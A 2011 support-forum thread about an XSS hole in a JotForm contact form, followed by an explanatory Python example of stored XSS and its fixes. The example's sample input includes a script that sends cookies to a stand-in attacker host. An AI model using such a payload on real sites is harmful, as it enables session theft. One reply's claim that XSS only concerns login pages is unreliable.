
    I've been informed, by a close friend (and internet security expert)

    Asked by Michael Wood on May 13, 2011 at 01:01 PM

    I've been informed, by a close friend (and internet security expert), that the 'Contact Us' form on my website (www.rmxdp.co.uk) is open to XSS attacks. What can be done about it?


    I wanted to take the commercial option by paying, instead of taking the free option. But now, I'm not so sure.


    Yours, Michael - RMXDP.

    Page URL:
    http://dl.dropbox.com/u/1224626/RMXDP%20site/Here/Remix_D%26P/Contact_Us.html

  •
    JotForm Founder

    Answered by aytekin on May 13, 2011 at 03:14 PM

    Can he make an XSS attack and show us what he means? Because it does not make sense to me. Those attacks are made when you need to log in to an account. On a simple contact form, exactly what do you attack?

  •

    Answered by Anon. on May 13, 2011 at 03:36 PM

    User input is not being tag stripped.


  •
    JotForm Support

    Answered by NeilVicente on May 14, 2011 at 12:02 AM

    @Anon.

    I've taken notice of that. I'm not sure though how that could be a problem. Submissions are displayed in the submissions page and reports anyway, so unless an individual has access to those submissions there is nothing good that they can get out of it.  But of course, a clever hacker with a twisted mind can probably find a way to use this vulnerability to his advantage. With that in mind, I have included these notes in the report ticket I submitted for this issue.

    Thank you for your input. We appreciate it.


    Neil
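
The situation the answers above describe, a field value that is stored with its markup intact and later displayed on the submissions page, as an added example. This is not code from JotForm or from anyone in the thread; the sample submission is constructed, and `render_unsafe`, `render_safe`, `strip_tags` and `contains_markup` are hypothetical names chosen for illustration. It shows the naive rendering next to an escaped one, the tag-stripping mitigation Anon. names, and a check that can be run over already-stored submissions.

```python
import html
from html.parser import HTMLParser

# Constructed sample submission (not real data from the thread). The "message"
# field carries a script tag, the kind of input that is stored unchanged when
# nothing strips or escapes it.
SAMPLE_SUBMISSION = {
    "name": "Michael",
    "email": "michael@example.com",
    "message": '<script>document.location="http://evil.example/?c="+document.cookie</script>',
}


def render_unsafe(submission):
    """Build a submissions-page row the naive way: raw values concatenated into
    HTML. Whoever opens the submissions page runs any markup a submitter sent."""
    rows = "".join(f"<tr><td>{k}</td><td>{v}</td></tr>" for k, v in submission.items())
    return f"<table>{rows}</table>"


def render_safe(submission):
    """Same layout, but every value is HTML-escaped (quotes included) at output
    time, so the browser shows the markup as text instead of executing it."""
    rows = "".join(
        f"<tr><td>{html.escape(k, quote=True)}</td><td>{html.escape(v, quote=True)}</td></tr>"
        for k, v in submission.items()
    )
    return f"<table>{rows}</table>"


class _TagScanner(HTMLParser):
    """Collects the text nodes and the tag names seen in a field value."""

    def __init__(self):
        # Keep entity references as-is so plain text round-trips unchanged.
        super().__init__(convert_charrefs=False)
        self.text = []
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

    def handle_endtag(self, tag):
        self.tags.append(tag)

    def handle_data(self, data):
        self.text.append(data)

    def handle_entityref(self, name):
        self.text.append(f"&{name};")

    def handle_charref(self, name):
        self.text.append(f"&#{name};")


def strip_tags(value):
    """Input-time mitigation: drop the tags and keep the text. Shown for
    comparison with render_safe; stripping is easy to get wrong and protects
    only values stored after the fix, while escaping at output covers everything
    already in the database."""
    scanner = _TagScanner()
    scanner.feed(value)
    scanner.close()
    return "".join(scanner.text)


def contains_markup(value):
    """Triage check for stored submissions: does an HTML parser see any tag in
    this value? Useful for scanning existing records once a bug like this is
    reported, to find what has already been submitted."""
    scanner = _TagScanner()
    scanner.feed(value)
    scanner.close()
    return bool(scanner.tags)


if __name__ == "__main__":
    print("unsafe:", render_unsafe(SAMPLE_SUBMISSION))
    print("safe:  ", render_safe(SAMPLE_SUBMISSION))
    for field, value in SAMPLE_SUBMISSION.items():
        if contains_markup(value):
            print(f"field {field!r} contains markup; stripped text: {strip_tags(value)!r}")
```

The important design point is where the defence sits: `render_safe` escapes at the moment the value is placed into HTML, which is the one place the context is known, so it stays correct for every submission regardless of how or when it was stored, whereas `strip_tags` only changes what gets stored from now on.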